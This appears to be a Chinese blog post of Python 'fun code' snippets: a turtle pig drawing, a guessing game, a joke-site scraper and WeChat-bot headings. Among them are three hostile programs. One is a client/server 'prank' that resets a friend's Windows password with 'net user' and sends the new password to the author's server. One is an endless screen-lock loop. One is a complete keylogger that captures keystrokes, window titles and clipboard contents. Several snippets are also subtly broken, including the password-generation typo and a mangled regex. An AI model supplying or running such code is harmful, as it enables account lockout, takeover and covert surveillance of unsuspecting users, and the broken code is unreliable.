- # coding:utf-8
- import turtle as t
- t.pensize(4)
- t.hideturtle()
- t.colormode(255)
- t.color((255,155,192),"pink")
- t.setup(840,500)
- t.speed(10)
- #鼻子
- t.pu()
- t.goto(-100,100)
- t.pd()
- t.seth(-30)
- t.begin_fill()
- a=0.4
- for i in range(120):
- if 0<=i<30 or 60<=i<90:
- aa=a+0.08
- t.lt(3) #向左转3度
- t.fd(a) #向前走a的步长
- else:
- aa=a-0.08
- t.lt(3)
- t.fd(a)
- t.end_fill()
- t.pu()
- t.seth(90)
- t.fd(25)
- t.seth(0)
- t.fd(10)
- t.pd()
- t.pencolor(255,155,192)
- t.seth(10)
- t.begin_fill()
- t.circle(5)
- t.color(160,82,45)
- t.end_fill()
- t.pu()
- t.seth(0)
- t.fd(20)
- t.pd()
- t.pencolor(255,155,192)
- t.seth(10)
- t.begin_fill()
- t.circle(5)
- t.color(160,82,45)
- t.end_fill()
- #头
- t.color((255,155,192),"pink")
- t.pu()
- t.seth(90)
- t.fd(41)
- t.seth(0)
- t.fd(0)
- t.pd()
- t.begin_fill()
- t.seth(180)
- t.circle(300,-30)
- t.circle(100,-60)
- t.circle(80,-100)
- t.circle(150,-20)
- t.circle(60,-95)
- t.seth(161)
- t.circle(-300,15)
- t.pu()
- t.goto(-100,100)
- t.pd()
- t.seth(-30)
- a=0.4
- for i in range(60):
- if 0<=i<30 or 60<=i<90:
- aa=a+0.08
- t.lt(3) #向左转3度
- t.fd(a) #向前走a的步长
- else:
- aa=a-0.08
- t.lt(3)
- t.fd(a)
- t.end_fill()
- #耳朵
- t.color((255,155,192),"pink")
- t.pu()
- t.seth(90)
- t.fd(-7)
- t.seth(0)
- t.fd(70)
- t.pd()
- t.begin_fill()
- t.seth(100)
- t.circle(-50,50)
- t.circle(-10,120)
- t.circle(-50,54)
- t.end_fill()
- t.pu()
- t.seth(90)
- t.fd(-12)
- t.seth(0)
- t.fd(30)
- t.pd()
- t.begin_fill()
- t.seth(100)
- t.circle(-50,50)
- t.circle(-10,120)
- t.circle(-50,56)
- t.end_fill()
- #眼睛
- t.color((255,155,192),"white")
- t.pu()
- t.seth(90)
- t.fd(-20)
- t.seth(0)
- t.fd(-95)
- t.pd()
- t.begin_fill()
- t.circle(15)
- t.end_fill()
- t.color("black")
- t.pu()
- t.seth(90)
- t.fd(12)
- t.seth(0)
- t.fd(-3)
- t.pd()
- t.begin_fill()
- t.circle(3)
- t.end_fill()
- t.color((255,155,192),"white")
- t.pu()
- t.seth(90)
- t.fd(-25)
- t.seth(0)
- t.fd(40)
- t.pd()
- t.begin_fill()
- t.circle(15)
- t.end_fill()
- t.color("black")
- t.pu()
- t.seth(90)
- t.fd(12)
- t.seth(0)
- t.fd(-3)
- t.pd()
- t.begin_fill()
- t.circle(3)
- t.end_fill()
- #腮
- t.color((255,155,192))
- t.pu()
- t.seth(90)
- t.fd(-95)
- t.seth(0)
- t.fd(65)
- t.pd()
- t.begin_fill()
- t.circle(30)
- t.end_fill()
- #嘴
- t.color(239,69,19)
- t.pu()
- t.seth(90)
- t.fd(15)
- t.seth(0)
- t.fd(-100)
- t.pd()
- t.seth(-80)
- t.circle(30,40)
- t.circle(40,80)
- #身体
- t.color("red",(255,99,71))
- t.pu()
- t.seth(90)
- t.fd(-20)
- t.seth(0)
- t.fd(-78)
- t.pd()
- t.begin_fill()
- t.seth(-130)
- t.circle(100,10)
- t.circle(300,30)
- t.seth(0)
- t.fd(230)
- t.seth(90)
- t.circle(300,30)
- t.circle(100,3)
- t.color((255,155,192),(255,100,100))
- t.seth(-135)
- t.circle(-80,63)
- t.circle(-150,24)
- t.end_fill()
- #手
- t.color((255,155,192))
- t.pu()
- t.seth(90)
- t.fd(-40)
- t.seth(0)
- t.fd(-27)
- t.pd()
- t.seth(-160)
- t.circle(300,15)
- t.pu()
- t.seth(90)
- t.fd(15)
- t.seth(0)
- t.fd(0)
- t.pd()
- t.seth(-10)
- t.circle(-20,90)
- t.pu()
- t.seth(90)
- t.fd(30)
- t.seth(0)
- t.fd(237)
- t.pd()
- t.seth(-20)
- t.circle(-300,15)
- t.pu()
- t.seth(90)
- t.fd(20)
- t.seth(0)
- t.fd(0)
- t.pd()
- t.seth(-170)
- t.circle(20,90)
- #脚
- t.pensize(10)
- t.color((240,128,128))
- t.pu()
- t.seth(90)
- t.fd(-75)
- t.seth(0)
- t.fd(-180)
- t.pd()
- t.seth(-90)
- t.fd(40)
- t.seth(-180)
- t.color("black")
- t.pensize(15)
- t.fd(20)
- t.pensize(10)
- t.color((240,128,128))
- t.pu()
- t.seth(90)
- t.fd(40)
- t.seth(0)
- t.fd(90)
- t.pd()
- t.seth(-90)
- t.fd(40)
- t.seth(-180)
- t.color("black")
- t.pensize(15)
- t.fd(20)
- #尾巴
- t.pensize(4)
- t.color((255,155,192))
- t.pu()
- t.seth(90)
- t.fd(70)
- t.seth(0)
- t.fd(95)
- t.pd()
- t.seth(0)
- t.circle(70,20)
- t.circle(10,330)
- t.circle(70,30)
- t.done()
程序是使用pycharm工具,python语言所写。程序包括客户端 client.py 和服务器端 server.py 两部分,利用了python中的socket包。
首先,你需要你和你的朋友在同一个局域网内,然后在你的主机上,运行服务器端 server.py。
然后,让你的朋友在他的电脑上运行客户端 client.py。
- # client.py:
- import socket
- import getpass
- import subprocess
- import random
- phone = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- phone.connect(('', 8080))
- user = getpass.getuser()
- psd = ''
- for j in range(1, 9):
- m = str(random.randrange(0, 10))
- psdpsd = psd + m
- subprocess.Popen(['net', 'User', user, psd])
- phone.send(psd.encode('utf-8'))
- back_msg = phone.recv(1024)
- phone.close()
- # server.py
- import socket
- phone = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- phone.bind(('', 8080))
- phone.listen(5)
- print('starting....')
- conn, addr = phone.accept()
- print(conn)
- print('client addr', addr)
- print('ready to read msg')
- client_msg = conn.recv(1024)
- print('client msg: %s' % client_msg)
- conn.send(client_msg.upper())
- conn.close()
- phone.close()
分享三:一段Python 恶搞代码
- from ctypes import *
- while True:
- user32 = windll.LoadLibrary('user32.dll')
- user32.LockWorkStation()
- import random
- rang1 = int(input("请设置本局游戏的最小值:"))
- rang2 = int(input("请设置本局游戏的最大值:"))
- num = random.randint(rang1,rang2)
- guess = "guess"
- print("数字猜谜游戏!")
- i = 0
- while guess != num:
- i += 1
- guess = int(input("请输入你猜的数字:"))
- if guess == num:
- print("恭喜,你猜对了!")
- elif guess < num:
- print("你猜的数小了...")
- else:
- print("你猜的数大了...")
- print("你总共猜了%d" %i + "次",end = '')
- print(",快和你朋友较量一下...")
- # -*- coding: utf-8 -*-
- import urllib2
- import re
- class QSBK:
- def __init__(self):
- self.pageIndex = 1
- self.user_agent = 'Mozilla/5.0 (Windows NT 10.0; WOW64)'
- self.headers = {'User-Agent': self.user_agent}
- self.stories = []
- # 存放程序是否继续运行的变量
- self.enable = False
- # 传入某一页的索引获得页面代码
- def getPage(self, pageIndex):
- try:
- url = 'http://www.qiushibaike.com/hot/page/' + str(pageIndex)
- request = urllib2.Request(url, headers = self.headers)
- response = urllib2.urlopen(request)
- pageCode = response.read().decode('utf-8')
- return pageCode
- except urllib2.URLError, e:
- if hasattr(e, "reason"):
- print u"连接糗事百科失败,错误原因", e.reason
- return None
- # 传入某一页代码,返回本页不带图片的段子列表
- def getPageItems(self, pageIndex):
- pageCode = self.getPage(pageIndex)
- if not pageCode:
- print "页面加载失败。。。"
- return None
- pattern = re.compile('
.*?"content">(.*?)- items = re.findall(pattern, pageCode)
- pageStories = []
- for item in items:
- rereplaceBR = re.compile('
')- text = re.sub(replaceBR,"
- ",item[1])
- pageStories.append([item[0].strip(),text.strip(),item[2].strip(),item[3].strip()])
- return pageStories
- # 加载并提取页面内容,加入到列表中
- def loadPage(self):
- if self.enable == True:
- if len(self.stories) < 2:
- pageStories = self.getPageItems(self.pageIndex)
- if pageStories:
- self.stories.append(pageStories)
- self.pageIndex += 1
- # 调用该方法,回车打印一个段子
- def getOneStory(self, pageStories, page):
- for story in pageStories:
- input = raw_input()
- self.loadPage()
- if input == "Q":
- self.enable = False
- return
- print u"第%d页 发布人:%s 赞:%s 评论:%s
- %s" %(page,story[0],story[2],story[3],story[1])
- def start(self):
- print u"正在读取糗事百科,按回车查看新段子,Q退出"
- self.enable = True
- self.loadPage()
- nowPage = 0
- while self.enable:
- if len(self.stories) > 0:
- pageStories = self.stories[0]
- nowPage += 1
- del self.stories[0]
- self.getOneStory(pageStories, nowPage)
- spider = QSBK()
- spider.start()
Python keylogger键盘记录的功能的实现主要利用了pythoncom及pythonhook,然后就是对windows API的各种调用。Python之所以用起来方便快捷,主要归功于这些庞大的支持库,正所谓"人生苦短,快用Python"。
- # -*- coding: utf-8 -*-
- from ctypes import *
- import pythoncom
- import pyHook
- import win32clipboard
- user32 = windll.user32
- kernel32 = windll.kernel32
- psapi = windll.psapi
- current_window = None
- #
- def get_current_process():
- # 获取最上层的窗口句柄
- hwnd = user32.GetForegroundWindow()
- # 获取进程ID
- pid = c_ulong(0)
- user32.GetWindowThreadProcessId(hwnd,byref(pid))
- # 将进程ID存入变量中
- process_id = "%d" % pid.value
- # 申请内存
- executable = create_string_buffer("\x00"*512)
- h_process = kernel32.OpenProcess(0x400 | 0x10,False,pid)
- psapi.GetModuleBaseNameA(h_process,None,byref(executable),512)
- # 读取窗口标题
- windows_title = create_string_buffer("\x00"*512)
- length = user32.GetWindowTextA(hwnd,byref(windows_title),512)
- # 打印
- print "[ PID:%s-%s-%s]" % (process_id,executable.value,windows_title.value)
- # 关闭handles
- kernel32.CloseHandle(hwnd)
- kernel32.CloseHandle(h_process)
- # 定义击键监听事件函数
- def KeyStroke(event):
- global current_window
- # 检测目标窗口是否转移(换了其他窗口就监听新的窗口)
- if event.WindowName != current_window:
- current_window = event.WindowName
- # 函数调用
- get_current_process()
- # 检测击键是否常规按键(非组合键等)
- if event.Ascii > 32 and event.Ascii <127:
- print chr(event.Ascii),
- else:
- # 如果发现Ctrl+v(粘贴)事件,就把粘贴板内容记录下来
- if event.Key == "V":
- win32clipboard.OpenClipboard()
- pasted_value = win32clipboard.GetClipboardData()
- win32clipboard.CloseClipboard()
- print "[PASTE]-%s" % (pasted_value),
- else:
- print "[%s]" % event.Key,
- # 循环监听下一个击键事件
- return True
- # 创建并注册hook管理器
- kl = pyHook.HookManager()
- kl.KeyDown = KeyStroke
- # 注册hook并执行
- kl.HookKeyboard()
- pythoncom.PumpMessages()
1. 需要的工具
2. 代码如下:
(1) 准备
(2) 获取来自机器人的回复信息
(3) 接受来自好友之间的对话信息
(4) 接受来自微信群里面的对话信息
(5) 运行
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